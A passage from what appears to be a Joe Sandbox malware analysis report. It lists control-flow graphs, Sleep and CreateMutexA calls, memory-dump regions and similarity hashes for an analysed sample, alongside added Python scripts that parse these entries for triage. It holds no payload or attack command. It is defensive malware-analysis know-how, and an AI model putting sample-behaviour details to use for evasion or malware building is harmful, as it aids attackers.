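NAME_ARG = {"CreateMutexA": 2}  # position of the lpName pointer (assumption: only this API is tabled)

def parse_apis(text):
    """'Name.MODULE(hex,hex), ref: hex' lines -> dicts with integer args and ref."""
    return [{"api": m[1], "module": m[2], "ref": int(m[4], 16),
             "args": [int(a, 16) for a in m[3].split(",") if a]}
            for m in API_LINE.finditer(text)]

def parse_cfg(text):
    """Token stream: '<id> <lo>[-<hi>] [call <addr>]* [<Api>]*' defines a block,
    '<a>-><b>' is an edge. Returns ({id: block}, [(src, dst), ...])."""
    nodes, edges, cur = {}, [], None
    toks = text.split()
    i = 1 if toks[:1] == ["control_flow_graph"] else 0
    while i < len(toks):
        tok = toks[i]
        if "->" in tok:
            src, dst = tok.split("->")
            edges.append((int(src), int(dst)))
        elif tok.isdigit():                      # new block: the next token is its range
            lo, _, hi = toks[i + 1].partition("-")
            cur = nodes[int(tok)] = {"lo": int(lo, 16), "hi": int(hi or lo, 16),
                                     "calls": [], "apis": []}
            i += 1
        elif tok == "call":                      # direct call made inside the block
            cur["calls"].append(int(toks[i + 1], 16))
            i += 1
        else:                                    # API name the sandbox resolved in the block
            cur["apis"].append(tok)
        i += 1
    return nodes, edges

def block_for(nodes, addr):
    """Id of the block whose address range contains addr, or None."""
    return next((n for n, b in nodes.items() if b["lo"] <= addr <= b["hi"]), None)

def predecessors(edges, block):
    return sorted(src for src, dst in edges if dst == block)

def shared_call_sites(calls_a, calls_b):
    """Same API at the same instruction address in both records."""
    return {(c["api"], c["ref"]) for c in calls_a} & {(c["api"], c["ref"]) for c in calls_b}

def pointer_as_string(value):
    """A 32-bit argument's own little-endian bytes read as a NUL-terminated string;
    None unless they are printable ASCII. This is what produced 'String ID: T2,'."""
    raw = struct.pack("<I", value).split(b"\x00", 1)[0]
    return raw.decode("ascii") if raw and all(0x20 <= b < 0x7F for b in raw) else None

def triage(apis_text, cfg_text):
    """Per record: entry address, parsed calls, and for each API its block, the
    blocks that branch into it, and the pointer-bytes rendering of its name argument."""
    calls, (nodes, edges) = parse_apis(apis_text), parse_cfg(cfg_text)
    sites = {}
    for c in calls:
        blk = block_for(nodes, c["ref"])
        idx = NAME_ARG.get(c["api"])
        sites[c["api"]] = {"block": blk, "preds": predecessors(edges, blk),
                           "name_arg_as_bytes": pointer_as_string(c["args"][idx]) if idx is not None else None}
    return {"entry": min(b["lo"] for b in nodes.values()), "calls": calls, "sites": sites}

if __name__ == "__main__":
    a, b = triage(*RECORD_A), triage(*RECORD_B)
    print("shared call sites:", sorted(shared_call_sites(a["calls"], b["calls"])))
    for rec in (a, b):
        for api, s in rec["sites"].items():
            print(f"{rec['entry']:x} {api}: block {s['block']} <- {s['preds']} "
                  f"name-arg bytes: {s['name_arg_as_bytes']!r}")
```

Run as-is it reports that both records share the Sleep and CreateMutexA call sites, that in the 26a079 record the call block 966 is reached from the three early-exit blocks 961, 969 and 972 (in the 26a1ae record the equivalent exits feed block 998 ahead of the call block 1008), and that rendering the lpName pointer as bytes yields "T2,", so any hunting rule keyed on that string would be keyed on an address, not a mutex name.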
Strings
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
• Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2,
                                                                                                                                                                                                                                          • API String ID: 1464230837-1264347116
                                                                                                                                                                                                                                          • Opcode ID: 8d544f21a98524bb1513a70dbb5032206a3386669710075c657f312ac38d1bfe
                                                                                                                                                                                                                                          • Instruction ID: bb11c69098927d4d3dbd6c7e59a064ff3bbccbd7da3c1265afa931d236b02d3a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d544f21a98524bb1513a70dbb5032206a3386669710075c657f312ac38d1bfe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03314431664201DBFB08DB78DDC9B6DB776EF86310F248618E408A72D5C77699E08A12
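The per-function entries in this report repeat two machine-readable lists: the `.sdmp` memory-dump identifiers under "Memory Dump Source" and the "APIs" lines such as `Sleep.KERNEL32(00000064), ref: 0026A963`. The following Python is an added example, not Joe Sandbox's own code: it parses both, decodes the page-protection and region-type fields with the winnt.h constants, flags writable-and-executable regions (the usual unpacking candidates), and maps pointer-sized API arguments back to the dump region they fall in. The field order assumed for the `.sdmp` name (`<pid>.<seq>.<stamp>.<address>.<protect>.<state>.<type>.<n>`) is inferred from this report's own entries and is an assumption, as is the "highest base not above the address" heuristic used to pick a region, since the report lists start addresses only. The sample input is copied from this entry's own lines.

```python
"""Decode the per-function metadata found in a Joe Sandbox report entry:
the ".sdmp" memory-dump identifiers under "Memory Dump Source" and the
"APIs" lines. Added example for this page; not Joe Sandbox's own code."""
import re
from dataclasses import dataclass

# Windows page-protection and region-type constants (winnt.h).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Field order of the .sdmp name is an ASSUMPTION inferred from this report's own
# entries (the region marked "based on PE: true" carries 01000000 = MEM_IMAGE and
# 00000040 = PAGE_EXECUTE_READWRITE):
#   <pid>.<seq>.<stamp>.<address>.<protect>.<state>.<type>.<n>.sdmp
SDMP_RE = re.compile(
    r"(?P<pid>[0-9A-Fa-f]{8})\.(?P<seq>[0-9A-Fa-f]{8})\.(?P<stamp>\d+)\."
    r"(?P<addr>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<n>[0-9A-Fa-f]{8})\.sdmp"
)
# Matches e.g. "Sleep.KERNEL32(00000064), ref: 0026A963".
API_RE = re.compile(
    r"(?P<fn>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

@dataclass
class Dump:
    pid: int
    addr: int
    protect: str
    mem_type: str
    writable_exec: bool  # RWX / execute-writecopy pages: unpacking candidates

@dataclass
class ApiCall:
    func: str
    module: str
    args: list
    ref: int

def parse_dump(line):
    """Parse one 'Source File' / 'Associated' line into a Dump, or None."""
    m = SDMP_RE.search(line)
    if not m:
        return None
    prot = int(m["prot"], 16)
    base = prot & 0xFF  # drop modifiers such as PAGE_GUARD (0x100)
    return Dump(
        pid=int(m["pid"], 16),
        addr=int(m["addr"], 16),
        protect=PAGE_PROTECT.get(base, hex(prot)),
        mem_type=MEM_TYPE.get(int(m["type"], 16), m["type"]),
        writable_exec=base in (0x40, 0x80),
    )

def parse_api(line):
    """Parse one 'APIs' line; arguments are hex exactly as the report prints them."""
    m = API_RE.search(line)
    if not m:
        return None
    args = [int(a, 16) for a in m["args"].split(",") if a.strip()]
    return ApiCall(m["fn"], m["mod"], args, int(m["ref"], 16))

def dump_containing(dumps, address):
    """Heuristic (assumption): the report gives start addresses only, so the
    dump with the highest base not above `address` is taken as its region."""
    below = [d for d in dumps if d.addr <= address]
    return max(below, key=lambda d: d.addr) if below else None

def triage(lines):
    """Summarise dumps and API calls; map pointer-sized API arguments (those at
    or above the lowest dump base, an assumption) to the dump region they hit."""
    dumps = [d for d in map(parse_dump, lines) if d]
    calls = [c for c in map(parse_api, lines) if c]
    lowest = min((d.addr for d in dumps), default=0)
    pointer_regions = {}
    for c in calls:
        for a in c.args:
            if dumps and a >= lowest:
                region = dump_containing(dumps, a)
                pointer_regions[(c.func, a)] = region.addr if region else None
    return {
        "dumps": len(dumps),
        "rwx": [hex(d.addr) for d in dumps if d.writable_exec],
        "calls": [(c.func, c.args) for c in calls],
        "pointer_regions": pointer_regions,
    }

# Sample input copied from this entry's "Memory Dump Source" and "APIs" lines.
SAMPLE = [
    "Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true",
    "Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmp",
    "Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmp",
    "Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmp",
    "Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmp",
    "Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmp",
    "Sleep.KERNEL32(00000064), ref: 0026A963",
    "CreateMutexA.KERNEL32(00000000,00000000,002C3254), ref: 0026A981",
]

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(key, value)
```

Run on the sample, `triage` reports four writable-and-executable image regions out of six dumps, `Sleep(0x64)` as a 100 ms delay, and the third `CreateMutexA` argument (the mutex name pointer 0x2C3254) landing in the RWX region dumped at 0x2C2000, which is where a string that is decrypted at run time rather than stored in a read-only section would be expected to live.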

Control-flow Graph (basic blocks with address range, calls and successor blocks, recovered from the graph data; the executed / not-executed colouring of the graph image is not preserved in text)
• 1022: 26a418-26a438 -> 1026, 1027
• 1026: 26a466-26a482 -> 1028, 1029
• 1027: 26a43a-26a446 -> 1030, 1031
• 1028: 26a484-26a490 -> 1032, 1033
• 1029: 26a4b0-26a4cf -> 1034, 1035
• 1030: 26a45c-26a463, call 27d663 -> 1026
• 1031: 26a448-26a456 -> 1030, 1036
• 1032: 26a4a6-26a4ad, call 27d663 -> 1029
• 1033: 26a492-26a4a0 -> 1032, 1036
• 1034: 26a4d1-26a4dd -> 1041, 1042
• 1035: 26a4fd-26a916, call 2780c0 (no successor in the graph data)
• 1036: 26a93f-26a949, call 296c6a * 2 -> 1053, 1054
• 1041: 26a4f3-26a4fa, call 27d663 -> 1035
• 1042: 26a4df-26a4ed -> 1036, 1041
• 1053: 26a94e -> 1055, 1056
• 1054: 26a949, call 296c6a -> 1053
• 1055: 26a953-26a994, Sleep, CreateMutexA -> 1058, 1059
• 1056: 26a94e, call 296c6a -> 1055
• 1058: 26a996-26a998 -> 1059, 1060
• 1059: 26a9a7-26a9a8 (exit block)
• 1060: 26a99a-26a9a5 -> 1059
APIs
• Sleep.KERNEL32(00000064), ref: 0026A963
• CreateMutexA.KERNEL32(00000000,00000000,002C3254), ref: 0026A981
Strings
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
• Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2,
                                                                                                                                                                                                                                          • API String ID: 1464230837-1264347116
                                                                                                                                                                                                                                          • Opcode ID: 5d47bf655e4f11df75dc39e027ddf70c2e4e2ebc059d4bd5b7d5ea91604cb500
                                                                                                                                                                                                                                          • Instruction ID: c8046bc5d814e4afd3784394a3d1b87a20811dba4cd9a6ffd19f33825ab5531d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d47bf655e4f11df75dc39e027ddf70c2e4e2ebc059d4bd5b7d5ea91604cb500
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F3168316241009BEB08DB7CDDCDB6DB7B6EF81314F208619E414A72D5CBB599E08E52

Control-flow Graph

control_flow_graph 1062 26a54d-26a56d 1066 26a56f-26a57b 1062->1066 1067 26a59b-26a5b7 1062->1067 1068 26a591-26a598 call 27d663 1066->1068 1069 26a57d-26a58b 1066->1069 1070 26a5e5-26a604 1067->1070 1071 26a5b9-26a5c5 1067->1071 1068->1067 1069->1068 1076 26a944-26a949 call 296c6a 1069->1076 1074 26a606-26a612 1070->1074 1075 26a632-26a916 call 2780c0 1070->1075 1072 26a5c7-26a5d5 1071->1072 1073 26a5db-26a5e2 call 27d663 1071->1073 1072->1073 1072->1076 1073->1070 1080 26a614-26a622 1074->1080 1081 26a628-26a62f call 27d663 1074->1081 1088 26a94e 1076->1088 1089 26a949 call 296c6a 1076->1089 1080->1076 1080->1081 1081->1075 1092 26a953-26a994 Sleep CreateMutexA 1088->1092 1093 26a94e call 296c6a 1088->1093 1089->1088 1096 26a996-26a998 1092->1096 1097 26a9a7-26a9a8 1092->1097 1093->1092 1096->1097 1098 26a99a-26a9a5 1096->1098 1098->1097
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0026A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,002C3254), ref: 0026A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
